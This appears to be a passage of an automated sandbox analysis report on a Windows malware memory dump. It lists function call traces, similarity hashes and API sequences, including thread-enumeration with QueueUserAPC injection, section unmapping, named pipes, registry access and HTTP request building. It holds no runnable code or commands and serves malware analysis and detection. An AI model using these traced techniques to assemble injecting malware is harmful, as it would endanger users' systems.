  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB35F, Relevance: 10.6, APIs: 7, Instructions: 65 Total matches: 59threadprocesslibrary
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D72AD, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 56file
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBEAE, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 120pipethread
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCA5, Relevance: 4.5, APIs: 3, Instructions: 27 Total matches: 86memorynative
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CCB46, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 378 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C51AB, Relevance: 31.9, APIs: 17, Strings: 1, Instructions: 438 Total matches: 26synchronizationmemorythread
Similarity
  • Total matches: 26
  • API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf
  • String ID: Main
  • API String ID: 2221804333-521822810
  • Opcode ID: c3ad4a6a675d9a90d5801a5de4b291fceb9dcbf29faafd690d2866f6f91e145a
  • Instruction ID: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
  • Opcode Fuzzy Hash: F551C076342F4283C127AC94C0857BAE546EF421E9C0C3712FA92795DD1E8B46F4FB9A
  • Instruction Fuzzy Hash: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
APIs
    • Part of subcall function 001C44E2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45BC
    • Part of subcall function 001C44E2: ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
    • Part of subcall function 001C44E2: CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45E0
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetVersionExA.KERNEL32 ref: 001C52AE
  • RtlAllocateHeap.NTDLL(00000000,00000042), ref: 001C52C1
  • wsprintfA.USER32 ref: 001C52F3
    • Part of subcall function 001C4EEE: lstrcmp.KERNEL32(?,?), ref: 001C4F65
    • Part of subcall function 001C4EEE: GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
    • Part of subcall function 001C4EEE: GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001C4EEE: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
    • Part of subcall function 001C4EEE: wsprintfA.USER32 ref: 001C50B7
    • Part of subcall function 001C4EEE: lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001C5377
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001C4202: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
    • Part of subcall function 001C4202: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
    • Part of subcall function 001C4202: HeapFree.KERNEL32(00000000,?), ref: 001C428F
    • Part of subcall function 001C4202: RegCloseKey.ADVAPI32(?), ref: 001C4298
  • WaitForMultipleObjects.KERNEL32(001EA06D,?,00000000,000000FF), ref: 001C541F
    • Part of subcall function 001C5147: WaitForSingleObject.KERNEL32(?,00000000), ref: 001C5153
    • Part of subcall function 001C5147: HeapFree.KERNEL32(00000000,?,?), ref: 001C5181
    • Part of subcall function 001C5147: ResetEvent.KERNEL32(?,?), ref: 001C519B
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5490
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • _allmul.NTDLL(001EAAEC,00000000,FF676980,000000FF), ref: 001C5535
    • Part of subcall function 001C3F95: RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
    • Part of subcall function 001C3F95: lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C54ED
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C5565
  • ReleaseMutex.KERNEL32(?), ref: 001C5582
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C55D6
  • SwitchToThread.KERNEL32 ref: 001C55F2
  • ReleaseMutex.KERNEL32(?), ref: 001C55FC
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C3815
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C38DC
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C394E
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?), ref: 001C3988
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5668
  • SwitchToThread.KERNEL32 ref: 001C5684
  • ReleaseMutex.KERNEL32(?), ref: 001C568E
    • Part of subcall function 001C5111: WaitForSingleObject.KERNEL32(00002710,00000120), ref: 001C512C
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001C569E
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
    • Part of subcall function 001C4198: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 001C41BA
    • Part of subcall function 001C4198: HeapFree.KERNEL32(00000000,00000000,00000129), ref: 001C41EB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3684, Relevance: 27.3, APIs: 18, Instructions: 264 Total matches: 106memorystring
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7341, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76 Total matches: 75stringfilememory
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C178D, Relevance: 18.1, APIs: 12, Instructions: 117 Total matches: 53registrythreadsleep
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
